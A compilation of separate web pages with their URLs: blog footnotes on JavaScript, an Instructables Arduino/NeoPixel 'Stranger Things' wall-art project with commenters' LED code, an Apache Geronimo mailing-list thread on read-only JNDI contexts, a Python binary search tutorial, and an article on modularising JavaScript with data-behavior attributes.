Jose, thank you for your answer. I tried the proposed solution, but it didn't work. I use the Windows operating system for development. I used the same code as in the "converter" example from the Ice 3.6 repository. This is the Python code that I used to initialize the string converter:

initData.properties.setProperty("Ice.Plugin.IceStringConverter", "Ice:createStringConverter windows=1251")
...
communicator = Ice.initialize(sys.argv, initData)

Unfortunately, I got the same error. I noticed that the documentation says that the string converter works only with Python 2. Is that correct? Maybe that's the problem. I'm using Python 3. Is there any solution to my problem for Python 3? Thank you.

I see, I first misunderstood your problem. The string converter will not help you in this case. Ice expects that all the strings on the wire are encoded as UTF-8; if an application uses a different encoding for the strings, it can use the string converter plug-in to automatically convert the strings to UTF-8 before marshaling them. In Python 3 you cannot use a string converter because the mapping uses Unicode objects. I don't see a workaround for the server sending non-UTF8 strings
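For background, the decode failure described in the thread can be reproduced in plain Python, independent of Ice; the byte string here is a made-up Windows-1251 sample, not data from the actual server:

```python
# Illustrative only: a made-up Windows-1251 byte sequence, not actual
# data from the Ice server discussed in the thread.
raw = "Привет".encode("cp1251")

# Decoding Windows-1251 bytes as UTF-8 fails with the error from the post:
# 'utf-8' codec can't decode byte ... invalid continuation byte
try:
    raw.decode("utf-8")
except UnicodeDecodeError as err:
    print("utf-8 decode failed:", err.reason)

# Decoding with the matching codec recovers the text.
text = raw.decode("cp1251")
print(text)  # Привет
```

This only helps where the raw bytes are accessible; as the last reply notes, the Python 3 Ice mapping hands the client Unicode objects, so the decode happens inside the runtime.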
https://forums.zeroc.com/discussion/46741/the-problem-with-strings-decoding-python
CC-MAIN-2022-05
refinedweb
458
57.87
Today I tried to install a brand-new MW 1.20.2 with SMW 1.8.4. After copying the files from Validator and SMW to the extensions path and adding the lines to LocalSettings.php, there is no SMW section in the special pages. Special:Version shows Validator and SMW to be installed. There are no errors as far as I can see. error_reporting( -1 ); ini_set( 'display_errors', 1 ); is in LocalSettings.php. Another wiki (MW 1.18.1 and SMW 1.7.x) runs fine on the same server. I am admin on the wiki. So where is the mistake?

Hey Andy, I had a quick look at this and created a bug report to keep track of the issue here: Cheers -- Jeroen De Dauw Don't panic. Don't be evil. --

Hello Everyone, I am pleased to announce that the Semantic MediaWiki of the month for March 2013 is the Domotiki. Domotiki is a collaborative website that aims to bring together all the knowledge and information in the field of automation, including hardware, software, protocols, dealers, installers and builders. Congratulations to the Domotiki team for all of your hard work and thank you for sharing your wiki with us. As always, please do not forget to nominate your wiki. Just follow the instructions here:. Thanks, -Desi

The forceshow parameter in Semantic Maps doesn't work, which means that if the query has zero results, the map doesn't show. It is a problem because I want a map whether there's a query result or not. So far I don't have a good workaround. The default parameter (to show a map with display_point) seemed to work when there's no query, but a map won't show if there's a query. The next best thing I can think of is to use #if parser functions, which would mean running the query twice (first to test whether it is valid, and then again to show the query). I think this is rather an inefficient way to do it.
Andy

Hi Michael,
Your setting of $smwgNamespacesWithSemanticLinks might have just been incorrect - I would try this instead:
$smwgNamespacesWithSemanticLinks[1010] = true;
-Yaron

On Thu, Feb 28, 2013 at 10:06 AM, Michael Alaimo <malaimo923@...> wrote:
> Please assist if you can. For some reason when using a custom namespace
> the semantic method for declaring properties does not work. Default
> MediaWiki namespaces do work.
>
> Is there a configuration setting that I need to utilize?
>
> I have this configuration in my LocalSettings.php of the MediaWiki
> installation.
>
> $wgExtraNamespaces = array(1010 => 'Acts');
>
> $smwgNamespaceIndex = 100;
>
> require_once( $IP.'/extensions/DataValues/DataValues.php');
> require_once( $IP.'/extensions/Validator/Validator.php');
> require_once( $IP.'/extensions/SemanticMediaWiki/SemanticMediaWiki.php' );
> enableSemantics('localhost');
>
> $smwgNamespacesWithSemanticLinks =
> array_merge($smwgNamespacesWithSemanticLinks, $wgExtraNamespaces);
>
> _______________________________________________
> Semediawiki-user mailing list
> Semediawiki-user@...

--
WikiWorks · MediaWiki Consulting ·
https://sourceforge.net/p/semediawiki/mailman/semediawiki-user/?viewmonth=201303&viewday=1
CC-MAIN-2017-17
refinedweb
527
59.8
The times function

How do you measure the time taken by a program, or a program fragment? The general approach is simple (pseudocode):

time time_thing(f) {
  time t1 = now();
  do_thing();
  time t2 = now();
  return t2 - t1;
}

The subtlety is in the semantics of your now function. As it turns out, C has many functions available to get the "current time". The obvious one is gettimeofday:

#include <sys/time.h>

int gettimeofday(struct timeval *restrict tp, void *restrict tzp);
// The system's notion of the current Greenwich time and the current time zone

But gettimeofday is inappropriate for measuring the running time of your process. gettimeofday measures "wall-clock time", which means you get a lot of noise due to other system activity, such as other processes and the kernel. There is another function called times, which has a different notion of "current time": the amount of time "charged" to the current process since it began. The kernel "charges" processes by keeping a counter of how much CPU time they have used.

#include <sys/times.h>

struct tms {
  clock_t tms_utime; // amount of CPU time charged to current process
  clock_t tms_stime; // amount of CPU time charged to kernel on behalf of current process
  // ...
};

clock_t times(struct tms * buf); // Fill buf with current process charge
                                 // (the return value is elapsed real time, in clock ticks)

Notice the counters distinguish between time charged to the process, and time charged to the kernel on behalf of that process. The latter might include things like: setting up connections, setting up kernel queues.

I wrote this because I felt like it. This post is my own, and not associated with my employer.
https://jameshfisher.github.io/2016/12/26/c-times.html
CC-MAIN-2019-18
refinedweb
267
68.4
Quality type for traditional Sanger and modern Illumina Phred scores. More... #include <seqan3/alphabet/quality/phred42.hpp> Quality type for traditional Sanger and modern Illumina Phred scores. The phred42 Quality alphabet represents the zero-based Phred score range [0..41] mapped to the consecutive ASCII range ['!' .. 'J']. It therefore can represent the Illumina 1.8+ standard and the original Sanger score. If you intend to use Phred scores exceeding 41, use the larger score types, namely seqan3::phred63 or seqan3::phred94, otherwise on construction exceeding scores are mapped to 41. Via seqan3::qualified, you can combine a nucleotide alphabet with the Phred score to save space. All dna and rna combinations with seqan3::phred42 still fit into a single byte, e.g. seqan3::qualified<seqan3::dna4, seqan3::phred42> (4 * 42 = 168 values can be stored in a single byte which can contain up to 256 values). Allow construction from the Phred score value. The seqan3::phred42 string literal. You can use this string literal to easily assign to std::vector<seqan3::phred42>: The seqan3::phred42 char literal. You can use this char literal to assign a seqan3::phred42 character: The projection offset between char and rank score representation. The projection offset between Phred and rank score representation.
https://docs.seqan.de/seqan/3-master-user/classseqan3_1_1phred42.html
CC-MAIN-2021-21
refinedweb
207
50.53
Finally an affordable and easy EDI solution

For years EDI solutions have been expensive and time-consuming to implement, requiring extensive programming assistance to the end user for the mapping of documents and integration into the customer's ERP system. With EDIView for TaskCentre, implementation cost is dramatically reduced by the introduction of an interactive tool for mapping the EDI documents, the Interchange Editor. With the Interchange Editor you don't need a programmer to spend endless hours mapping the documents. Instead, a consultant or a skilled end user can map a document in a few hours. The easy-to-use editor enables mapping of standard EDI files like EDIFACT, TradaCom, VICS and many others. Standard mappings for many documents are available on request, which makes setting up EDIView for TaskCentre even easier. EDIView for TaskCentre not only maps traditional EDI documents but also character-separated documents, fixed-length documents and XML documents. You can also define any kind of translation from one document type to another, e.g. you can translate an EDI document into an XML document, if that is what you can import into your ERP system. When the document is mapped, integration with the ERP system is a simple matter of dragging and dropping fields into the Interchange. Despite the easy-to-use interface, the system still enables you to create user-defined data conversions as part of the ERP integration if needed, enabling you to implement very customer-specific needs. Gone are the days where the system determines the level of integration with the ERP system. EDIView for TaskCentre uses the standard ERP connectors from TaskCentre to connect to a wide range of ERP systems. With the other tools of TaskCentre there are endless possibilities to set up additional actions during the creation or import of EDI documents.
Examples of additional tasks include sending an email in case of an error during conversion, or starting an approval workflow upon reception of a new order. Included in EDIView for TaskCentre you will also find tools to connect to the WorldVAN for direct, easy upload and download of EDI files from the VAN. You can have a look here at some examples we have already done with EDIView for TaskCentre. A small introductory video
http://dimensionsoftware.dk/solutions/ediview-for-taskcentre.aspx
CC-MAIN-2015-32
refinedweb
378
50.26
It's been about a thousand years (well many seconds at least...) since our last XNA post, it's been ages since we've had a game (well since a few posts ago) and a good while since we've done Windows Phone 7... well... um... err.... um... okay, okay... fine. Still I thought this was a cool XNA game for the Windows Phone that talked about something I've not seen covered much, the conversion from a much older Windows version using Managed DirectX to Windows Phone 7 and XNA. Also I liked how this project showed off the "standing on shoulders of giants" concept with how it leveraged some other open source code snips. And who doesn't want to play an Invasion game on your Windows Phone 7.x where you have all the source?

Invasion Game in XNA for Windows Phone 7

Invasion is a UFO-shooter game, originally designed by Mauricio Ritter. This article describes my port of the Invasion game for Windows (in C# and Managed-DirectX) to Windows Phone 7 (C# and XNA 4.0). The full source code is provided. Back in 2002, Mauricio Ritter posted his "Invasion" UFO-shooter 2D game on CodeProject. It was written in C++ and used the DirectDraw APIs in DirectX 7 that Microsoft removed in DirectX 8. The following year, Steve Maier ported the game to C# with Managed DirectX and also posted it here on CodeProject. Managed DirectX went away after 2005 and was replaced by XNA. Both of those legacy versions ran on Windows XP. This article describes my 2011 week-long port of Steve's Managed DirectX version to Windows Phone 7 using XNA 4.0. I had some goals for porting this game beyond "just get it working on Windows Phone 7".
Specifically, they were:

- Redesign the code into more manageable classes
- Make the code more readable so that beginners could understand it
- Simplify the code by using more C# language features and XNA framework classes
- Polish the game so that I could release it on the Windows Phone Marketplace
- Keep it free and Open-Source
- But still finish the port within a week!

Considering my timeframe (which I extended by a few days), I was only somewhat successful. I submitted v1.0 to the Marketplace today and consider it a "work-in-progress". I had mentioned other open source projects?

Borrowed Open Source Code

There were some features that I wanted to add to the game and fortunately had some already-made code files that made adding them quick and easy. You can find these files in the ImproviSoft namespace's Diagnostics, Drawing, and System projects. Don't let the namespace fool you though, this code is free Open-Source and my company (ImproviSoft) didn't write much of it. The files contain comments with their source indicated - primarily Microsoft's XNA team, XNAWiki.com, and Elbert Perez of OccasionalGamer.com. So thank them for it! Here's a list of those files:

- FrameRateCounter.cs - displays the frames/second onscreen for debugging purposes, from Shawn Hargreaves (Microsoft XNA team).
- SimpleShapes.cs - class for drawing 2D primitives (e.g., a Rectangle), from XNAWiki.com (although probably named something else there).
- Accelerometer.cs - class for handling accelerometer input, from create.msdn.com (Microsoft XNA team).
- Camera2D.cs - class for handling a 2D camera (to make the screen shake!), from Elbert Perez of OccasionalGamer.com - thanks, Elbert!
- InputState.cs - class for handling all sorts of input devices, including the touch-screen, from create.msdn.com (Microsoft XNA team).
- MusicManager.cs - class for playing background music, from create.msdn.com (Microsoft XNA team).
- RandomManager.cs - simple class for generating random numbers - OK, I possibly wrote this and it took just two minutes.
- SoundManager.cs - simple class to wrap SoundEffect.Play calls for sounds with adjusted maximum-volume.
- VibrationManager.cs - class for making the phone vibrate on command (for force-feedback effect), from create.msdn.com (Microsoft XNA team).

Here's a snap of the Solution:

And finally a snap of it running in the emulator...
https://channel9.msdn.com/coding4fun/blog/Invasion-Game-for-Windows-Phone-7
CC-MAIN-2017-34
refinedweb
685
66.33
Fantasy land is great. It provides a standard naming convention for these things called algebraic structures. It allows a single function to work with a plethora of structures. No modification required. And it gets better. We don't even have to write the functions. Libraries like Ramda are already compliant. So we have this whole world of interoperable functions and structures open to us. The title 'fantasy land,' though originally a joke, is quite fitting.

Trouble in Fantasy Land

Fantasy land isn't perfect though. And it's not the only way to do algebraic structures in JavaScript. Some of the trouble with fantasy land comes from its implementation. It assumes that we use objects and methods for everything. And that's a totally reasonable way to do things. But it's not the only way. And it has some drawbacks.

Name conflicts and namespacing

One of the drawbacks is name conflicts. Early versions of fantasy land had straightforward method names. That is, names like: equals, concat, empty, map, of, reduce, sequence, chain, extend, and extract. Many of the names were based on existing JavaScript interfaces, like Array methods. But, as Scott Sauyet put it, the trouble is "these are very common English words, with many meanings." So it's easy to run into problems if you're working in a domain that uses those names in a different context. For example, you might be creating a geospatial application. In that context, map might have a different meaning. That might seem like a trivial example, but it comes up more often than anyone would like. To avoid this, the fantasy land authors agreed to namespace all the method names. So now, instead of calling x.map(f), we now call x['fantasy-land/map'](f). It solves the conflict problem. But it's not pretty. It makes the specification hard to read. And it makes the methods inconvenient to type manually. All in all, it's not much fun. Now, this isn't quite as bad as it sounds.
That is, it's not so bad if you understand the intent of Fantasy Land. You see, Fantasy Land isn't really intended for us mere mortals. Instead, it's intended for use by library authors. The idea being, us mortal programmers shouldn't need to type these method names by hand. The expectation is that we'd be using a library like Ramda. So instead of something like this:

import Maybe from 'my/maybe/library/somewhere';

const noStupid = s => (s.includes('stupid')) ? Maybe.Just(s) : Maybe.Nothing;

// These namespaced method calls look silly.
const title = new Maybe('Yes, this is a silly example');
const sentence = title['fantasy-land/map'](s => `${s}.`);
const validSentence = sentence['fantasy-land/chain'](noStupid);

With Ramda, we would pull in functions like map(), chain() and pipe() to manipulate our structures:

import Maybe from 'my/maybe/library/somewhere';
import {chain, map, pipe} from 'ramda';

const noStupid = s => (s.includes('stupid')) ? Maybe.Just(s) : Maybe.Nothing;

// Note the lack of method calls in our pipe(). Much prettier.
// But, we did have to pull in the whole Ramda library to make
// it happen.
const title = new Maybe('Yes, this is a silly example');
const validSentence = pipe(
    map(s => `${s}.`),
    chain(noStupid),
)(title);

As you can see, once we introduce Ramda, all the Fantasy Land prefixes disappear. So namespaces aren't so bad, right? We don't have to worry about them anymore. Ramda just takes care of it. Everyone's happy, yes? Except, those prefixes aren't gone. They're just hidden. And they keep poking their little heads out. For example, consider Maybe.of(). With the namespace prefix it becomes Maybe['fantasy-land/of']. It's a static method. So there's no Ramda function for that. This means that if we want to use that static method, we're stuck writing out the prefix. That, or we write our own alias for it. And that's OK. But not much fun. None of this is the end of the world. It's just inconvenient. It's friction.
And it would be nice if there was less friction.

Wrapping and unwrapping values

The other drawback Fantasy Land has is all the wrapping and unwrapping. To make things work with Fantasy Land we're forever wrapping up values inside objects. And sometimes, it's objects inside objects, inside objects. And that's not much fun either. Most of the time, it's all fine. But at some point, we need to work with something outside our world of algebraic structures. Perhaps a DOM element or React component. Or even a database connection. Here, we have two options:

- Unwrap values out of our algebraic structures somehow, or
- Wrap the outside thing into a fantasy-land structure.

Either way, we're either wrapping or unwrapping somewhere. This wrapping business is actually a good thing. Especially if you're a beginner at functional programming. The wrapping and unwrapping forces you to think about types. That's important in a loosey-goosey-typed1 language like JavaScript. For example, consider a simple implementation of Maybe. We can't just concatenate a Maybe onto the end of a String.

import Maybe from 'my/maybe/library/somewhere';

const valueIGotFromParsingJSON = new Maybe('Another silly example');
const sentencifiedTitle = valueIGotFromParsingJSON + '.';
// This doesn't work.

If we want to get the value out of the Maybe container, we have to use something like .orElse().

import Maybe from 'my/maybe/library/somewhere';

const valueIGotFromParsingJSON = new Maybe('Another silly example');
const sentencifiedTitle = valueIGotFromParsingJSON.orElse('No title found') + '.';

Again, this is a good thing. It forces us to consider what happens if the value is null. And that's the whole point of Maybe. We can't fool ourselves into thinking that null isn't a possibility. Similarly, Task forces us to think about what happens if an operation fails. And Either can force us to think about how we're going to deal with exceptions.2 All good things. Still, wrapping and unwrapping creates drag.
Once you're more experienced, those objects can start to feel a little heavy. A good library like Ramda helps. And, as we saw earlier, once you have some good pipelines set up the containers start to disappear. But it's still a drag. It's not terrible. Just inconvenient. Particularly when wrapping things that are already objects, like DOM elements or Promises. They have their own set of methods. But to get at them you have to go via .map(), .ap() or .chain(). Not hard. Just a drag.

An alternative

So, Fantasy Land isn't perfect. In fact, it can be a bit annoying at times. And some of that is JavaScript's fault. But not all of it. Still, imagine if we could have algebraic structures without those drawbacks. What if there was a way to create structures without having to worry so much about name conflicts? And imagine if we didn't have to wrap all our data in objects. We could work with strings, numbers or even DOM elements, just as they are. No wrapping or unwrapping. Algebraic structures with plain ol' JS data types. Sound a bit fantastical? Well it's real. It's made possible by the Static Land specification. What's Static Land then? Well, like Fantasy Land, Static Land is a specification for common algebraic structures. Fantasy Land assumes that you're creating structures using objects and methods. But Static Land assumes you're creating structures using plain ol' JavaScript functions. But they must be static functions. That means that we can't use the magic this keyword anywhere. We're still free to have classes, objects and modules. We can group our functions together as we like. But the functions themselves can't be methods. No this. Now, if you've had some training in computer science, that might sound regressive. Especially if you work with languages like C# or Java. In my university classes they taught us to move beyond those quaint static modules of the past. They taught us to embrace Object-Oriented Programming (OOP). The way of the future!
So I spent a lot of time developing intuitions about classes and objects. That was the Best Practice™️ way to build programs. But functional programming throws many of my old intuitions on their head. And Static Land gets the job done entirely with static methods. It’s great.

An example

What does a Static Land algebraic structure look like? Perhaps the best way to show this is by example. We’ll use static-land versions of Maybe and List (arrays), but we’ll do it using a real life kind of problem. A problem thousands of web developers are working on right this second. The problem is this: We have some settings data we got from a server somewhere. We want to put those values into a form on some kind of settings screen. That is, we’re making an HTML form. The task is sticking values in HTML form fields. And I’d estimate this is a large chunk of what most of us professional web developers do all day. Let’s look at how a static land version of Maybe and List can help get it done.

In our imaginary problem, we have not one, but two blobs of data. Perhaps we fetched them via an XHRequest. Perhaps we read them from a file. It doesn’t matter. The point is, we have two of them:

- One blob of data to specify the form structure; and
- One blob of data that has the values for the form.

We want to take these two blobs, smush them together, and create some HTML representing our form. Here’s some sample data to show what I’m talking about. First, the form specification:

```js
const formSpec = [
  /* … */
  {
    id: 'comments',
    label: 'Comments',
    type: 'textarea',
    dflt: '',
    name: 'comments',
  },
  {
    id: 'submitbtn',
    label: 'Submit',
    type: 'submit',
  },
];
```

And second, the form data:

```js
const formValues = [
  {
    id: 'person-name',
    value: 'Cheshire Cat',
  },
  {
    id: 'person-email',
    value: 'cheshire.cat@example.com',
  },
  {
    id: 'wonderland-resident',
    value: ['isresident'],
  },
];
```

With these two data structures, we have enough information here to create some kind of form.

List

We’ve got a motivating example now.
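To make the goal concrete before writing any machinery: "smushing" a spec entry together with its matching value entry is, at heart, just an object merge. (The specEntry below is an assumed example, since the top of formSpec is cut off above; it simply follows the same shape as the other entries.)

```javascript
// One assumed formSpec entry, and the matching formValues entry from above.
const specEntry = {
  id: 'person-name',
  label: 'Name',
  type: 'text',
  dflt: '',
  name: 'person-name',
};
const valueEntry = {id: 'person-name', value: 'Cheshire Cat'};

// Merging keeps the spec fields and adds the value on top.
const merged = {...specEntry, ...valueEntry};

console.log(merged.value); // 'Cheshire Cat'
console.log(merged.type);  // 'text'
```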
Let’s take a look at what a Static Land structure might look like. Here’s an implementation of List. It’s not the only way to implement List. And perhaps it’s not the best way to implement List. But it will do for now.

```js
// Curry function stolen from Professor Frisby's Mostly Adequate Guide
// curry :: ((a, b, ...) -> c) -> a -> b -> ... -> c
function curry(fn) {
  const arity = fn.length;
  return function $curry(...args) {
    if (args.length < arity) {
      return $curry.bind(null, ...args);
    }
    return fn.call(null, ...args);
  };
}

// Unary takes a function and makes it ignore everything
// except the first argument.
// unary :: ((a, b, ...) -> c) -> a -> c
function unary(f) {
  return x => f(x);
}

// The List implementation itself.
const List = {
  // map :: (a -> b) -> List a -> List b
  map: curry(function map(f, xs) {
    return xs.map(unary(f));
  }),

  // chain :: (a -> List b) -> List a -> List b
  chain: curry(function chain(f, xs) {
    return xs.flatMap(unary(f));
  }),

  // ap :: List (a -> b) -> List a -> List b
  ap: curry(function ap(fs, xs) {
    return List.chain(f => List.map(f, xs), fs);
  }),

  // reduce :: (a -> b -> a) -> a -> List b -> a
  reduce: curry(function reduce(f, a, xs) {
    return xs.reduce(f, a);
  }),
};
```

It doesn’t look like much, does it? We’re mostly just delegating to built-in methods. Even with unary() and curry() making things more verbose, it’s still not long.

The unary() function is there as a guard. It makes sure that callback functions only see a single parameter. This can be handy when using a function like parseInt(). Functions that take an optional second (or third) parameter can cause problems. The built-in .map() passes three parameters to the callback function:

- The value from the array;
- The current index; and
- The entire array itself.

Now parseInt(), for example, will interpret the index as the radix (also known as base). That’s not usually what we want. So we use unary() to prevent confusion.

Back to our example though. How do we use List?
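Before we do, a quick aside showing the exact parseInt() trap that unary() guards against:

```javascript
// Array.prototype.map passes (value, index, array) to its callback,
// and parseInt treats that index argument as the radix.
const unary = f => x => f(x);

const broken = ['10', '10', '10'].map(parseInt);
console.log(broken); // [10, NaN, 2]: radix 0 (default), radix 1 (invalid), radix 2 (binary)

const fixed = ['10', '10', '10'].map(unary(parseInt));
console.log(fixed); // [10, 10, 10]
```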
We’ll start by defining a few utility functions. For simplicity, these return strings. It wouldn’t be hard to change them to return, say, React components though. For now, we’ll leave them as strings.

```js
function sanitise(str) {
  const replacements = [
    [/</g, '&lt;'],
    [/"/g, '&quot;'],
    [/'/g, '&#39;'],
    [/\\/g, '&#92;'],
  ];
  const reducer = (s, [from, to]) => s.replace(from, to);
  return List.reduce(reducer, String(str), replacements);
}

function text({id, label, dflt, value, name}) {
  return `
  <div class="Field">
    <label class="Field-label" for="${id}">${label}</label>
    <input type="text" name="${name}" value="${sanitise(value)}" id="${id}" />
  </div>`;
}

function email({id, label, dflt, value, name}) {
  return `
  <div class="Field">
    <label class="Field-label" for="${id}">${label}</label>
    <input type="email" name="${name}" value="${sanitise(
    value,
  )}" id="${id}" />
  </div>`;
}

function checkboxItem(value) {
  return ({label: lbl, value: val, name}) =>
    `<li><input class="Checkbox-input" type="checkbox" name="${name}" checked="${
      val === value ? 'checked' : ''
    }" value="${sanitise(val)}" /><label for="">${lbl}</label></li>`;
}

function checkbox({id, label, type, options, value, name}) {
  return `
  <fieldset id="${id}" class="Field Field-checkboxes">
    <legend class="Field-label Field-label--checkboxes">${label}</legend>
    <ul class="CheckboxList">
    ${List.map(checkboxItem(value), options).join('')}
    </ul>
  </fieldset>`;
}

function textarea({id, label, value, dflt, name}) {
  return `
  <div class="Field">
    <label class="Field-label" for="${id}">${label}</label>
    <textarea name="${name}" id="${id}">${sanitise(value)}</textarea>
  </div>`;
}
```

There’s nothing particularly interesting going on here. A little destructuring; a little string interpolation. No big deal. We’ve already used List.map() and List.reduce(). Note how we casually call .join() straight after calling List.map() in checkbox(). That’s a native array method right there. No unwrapping. No proxy methods. Just a straight value. Neat, huh?
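That last point deserves a tiny demonstration. Because this List delegates to the built-in array methods, List.map() hands back a plain array, so native methods like .join() are right there with no unwrapping. (A minimal, self-contained re-creation of List.map() follows, so the snippet runs on its own.)

```javascript
// Minimal re-creation of List.map(): delegate straight to the built-in.
const unary = f => x => f(x);
const List = {
  // map :: (a -> b) -> List a -> List b
  map: (f, xs) => xs.map(unary(f)),
};

const items = List.map(s => `<li>${s}</li>`, ['a', 'b']);

console.log(Array.isArray(items)); // true: just an ordinary array
console.log(items.join(''));       // '<li>a</li><li>b</li>'
```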
Two minor bits of cleverness to note in these utility functions:

- The destructured parameter names look a lot like the keys in our form structure data blob. (That is, our formSpec variable).
- The names of our HTML functions match up rather well with the values for type in our form structure. (That’s formSpec again).

These are deliberate choices. We’ll see how they help in a little bit. (If you haven’t figured it out already).

Getting back to the data, we have two blobs: formSpec and formData. The first, formSpec, has almost everything we need. But it’s missing some data. We need those values from formData. And we need some way to smush those two data structures together. As we go, we also need to make sure the right values end up in the correct form fields. How do we know which form values go with which specification? By matching the id fields in each object. In other words, we want to match each entry in formData with an entry in formSpec. And then smush those two objects together. We should end up with a new array of smushed objects that have the pre-filled values we want.

Let’s put that another way. For each item in formSpec, we want to check to see if there’s an item in formData with the same id. If so, then we want to merge those values together. It might look something like this:

```js
const mergeOnId = curry(function mergeOnId(xs, ys) {
  return List.map(
    x => Object.assign(x, ys.find(y => x.id === y.id)),
    xs,
  );
});
```

This function takes the first list, and runs through each item. For each item it looks for a corresponding item in the second list. If it finds one, it merges the two. If it doesn’t find one, it merges undefined, which returns the same object. It may not be the most efficient way of doing it, but it gets the job done.

Something bothers me about this function though. It’s a little too specific. We’ve hard-coded the field we’re matching on, id. It might give us some more flexibility if we made that field a parameter.
So let’s rewrite our function to do that:

```js
const mergeOn = curry(function mergeOn(key, xs, ys) {
  return List.map(
    x => Object.assign(x, ys.find(y => x[key] === y[key])),
    xs,
  );
});
```

We have a way to merge our big list of form data. Next, we want to turn that form data into HTML. We do that by creating a function that looks at a given entry and calls the appropriate utility function. It might look something like this:

```js
function toField(data) {
  const funcMap = {text, email, checkbox, textarea};
  return funcMap[data.type](data);
}
```

So, we could (if we wanted to) run toField() with List.map() to get an array full of HTML strings. But we don’t really want an array, we want one big string of HTML. We want to go from lots of values in the list down to a single value. Sounds like a job for List.reduce().[3]

```js
function formDataToHTML(formData) {
  return List.reduce(
    (html, fieldData) => html + '\n' + toField(fieldData),
    '',
    formData,
  );
}
```

And from there it’s not too difficult to compose everything together…

```js
// Pipe stolen from "JavaScript Allongé, the 'Six' Edition,"
// by Reg "raganwald" Braithwaite.
// Pipe composes functions in reverse order.
function pipe(...fns) {
  return value => fns.reduce((acc, fn) => fn(acc), value);
}

const wrapWith = curry(function wrapWith(tag, data) {
  return `<${tag}>${data}</${tag}>`;
});

function processForm(formSpec, formValues) {
  return pipe(
    mergeOn('id', formSpec),
    formDataToHTML,
    wrapWith('form'),
  )(formValues);
}
```

You can see the whole thing working together in this code sandbox. We have a neat little implementation. But perhaps it’s somewhat… underwhelming. We haven’t used any List functions besides map() and reduce(). It doesn’t seem worth introducing List for two functions. And they’re built-ins anyway. But my goal here isn’t to show you the absolute best way to build an HTML form. Rather, it’s to show how working with Static Land might look in practice. To that end, let’s introduce Maybe as well.
That way we can see two algebraic structures working together.

Maybe

There’s some problems with our code so far. First, notice that when we run our code, the comment area shows ‘undefined’. That’s less than ideal. One way to deal with this is to add some default values to our form specification. The new specification might look like so:

```js
const formSpec = [
  /* … */
  {
    /* … */
    dflt: '',
  },
  {
    id: 'comments',
    label: 'Comments',
    type: 'textarea',
    dflt: '',
    name: 'comments',
  },
];
```

All we’ve done is add some default values using the key dflt.[4] So, we’ll continue to merge the two data structures as before. But we need some way to merge the dflt values with the value values. That is, if there is no value then use dflt. Sounds like a job for Maybe. So, a simple Maybe implementation might look like this:

```js
const isNil = x => (x === null || x === void 0);

const Maybe = {
  // of :: a -> Maybe a
  of: x => x,

  // map :: (a -> b) -> Maybe a -> Maybe b
  map: curry(function map(f, mx) {
    return isNil(mx) ? null : f(mx);
  }),

  // ap :: Maybe (a -> b) -> Maybe a -> Maybe b
  ap: curry(function ap(mf, mx) {
    return isNil(mf) ? null : Maybe.map(mf, mx);
  }),

  // chain :: (a -> Maybe b) -> Maybe a -> Maybe b
  chain: curry(function chain(f, mx) {
    return Maybe.map(f, mx);
  }),

  // orElse :: a -> Maybe a -> a
  orElse: curry(function orElse(dflt, mx) {
    return isNil(mx) ? dflt : mx;
  }),
};
```

It’s a little bit different if you’re used to the Fantasy Land way of doing things. Our .of() function is just identity. And chain() just calls map(). But it’s still a valid implementation of Maybe. It encapsulates all those isNil() checks for us. So how might we use it? Let’s start by setting those default values. We’ll create a new function for the purpose:

```js
function setDefault(formData) {
  return {
    ...formData,
    value: Maybe.orElse(formData.dflt, formData.value),
  };
}
```

We can compose this function with toField() when we process each item.
So our formDataToHTML() function becomes:

```js
function formDataToHTML(formData) {
  return List.reduce(
    (html, fieldData) => html + '\n' + toField(setDefault(fieldData)),
    '',
    formData,
  );
}
```

There’s a second problem with our code though. This time it’s in the toField() function. And it’s potentially more serious than printing ‘undefined’ in a text field. Let’s take a look at the code for toField() again:

```js
function toField(data) {
  const funcMap = {text, email, checkbox, textarea};
  return funcMap[data.type](data);
}
```

What happens if our form specification changes and introduces a new type of field? It will try to call funcMap[data.type] as a function. But there is no function. We’ll get the dreaded “undefined is not a function” error. That’s never fun. Fortunately, Maybe can help us out. We have a function that may be there, or it may be undefined. From a static-land point of view, this is already a Maybe. So, we can use Maybe.ap() to apply the function to a value.

```js
function toField(data) {
  const funcMap = {text, email, checkbox, textarea};
  return Maybe.ap(funcMap[data.type], data);
}
```

And suddenly, the problem just disappears. It’s like magic. Here’s what it looks like when we compose it together:

```js
// Pipe stolen from "JavaScript Allongé, the 'Six' Edition,"
// by Reg "raganwald" Braithwaite.
// Pipe composes functions in reverse order.
const pipe = (...fns) => (value) => fns.reduce((acc, fn) => fn(acc), value);

const wrapWith = curry(function wrapWith(tag, data) {
  return `<${tag}>${data}</${tag}>`;
});

function processForm(formSpec, formValues) {
  return pipe(
    mergeOn('id', formSpec),
    List.map(setDefault),
    formDataToHTML,
    wrapWith('form'),
  )(formValues);
}
```

See the whole thing working together in this Code Sandbox.

Weighing up the pros and cons

Now, you may find all this a little… dull; unimpressive; ho hum, even. In fact, I’m hoping you do. That’s kind of the point. Static Land algebraic structures aren’t any more complicated than Fantasy Land ones.
They just come at the problem in a different way. They have a different set of design trade-offs. Those design trade-offs are worth thinking about.

We lose some type safety implementing Maybe this way.[5] We’re no longer forced to use something like .orElse() to extract a value. We might get a little lax if we’re not careful. But at the same time, you can see how nice this is. We can use algebraic structures without wrapping and unwrapping values all the time. To me, it feels more natural. That’s completely subjective, I know, but that doesn’t make it irrelevant.

Another trade-off is that we lose the ability to use utility libraries like Ramda in the same way. With Fantasy Land, we can write a map() function that delegates to myObject['fantasy-land/map'](). And map() will then work with any object that has a fantasy-land/map method. In the examples above, however, we had to be explicit about which map() function we were calling. It was either List.map() or Maybe.map(). So, we’re doing some work that a compiler might otherwise do for us. Furthermore, writing out all those prefixes (i.e. List or Maybe) gets annoying.

Finally, there’s something else to consider with regards to wrapping and unwrapping. Notice how we were able to use List with plain ol' JavaScript arrays. We didn’t have to call myList.__value.find() to make our merge function. It makes our code easier to integrate. We’re not using a custom-made class. It’s native JavaScript data types and functions. That’s it.

But which one is better?

So, you might be wondering: “Which one is better?” And you probably know what I’m going to say: “It depends”. Static Land is a mixed bag. We gain some convenience and interoperability, but at a cost. We end up writing out a bunch of module prefixes. We swap one namespace work-around for another. So they come out roughly even. That said, in certain situations, Static Land really shines. For example, you may be working with React components or DOM elements.
And asking the rest of your team to wrap them up in another layer may be too much. It’s not worth the effort to make them work with Fantasy Land. But Static Land lets you work with those data types directly. Yet still maintain the benefits of algebraic structures. For those situations, it’s lovely.[6]

But really, my main goal for this post was to raise some awareness for Static Land. Just to get it out there as an option. I don’t see many other people writing about it. But I think it’s cool and deserves more attention than it gets. So maybe take a look and see if it might come in handy for you.

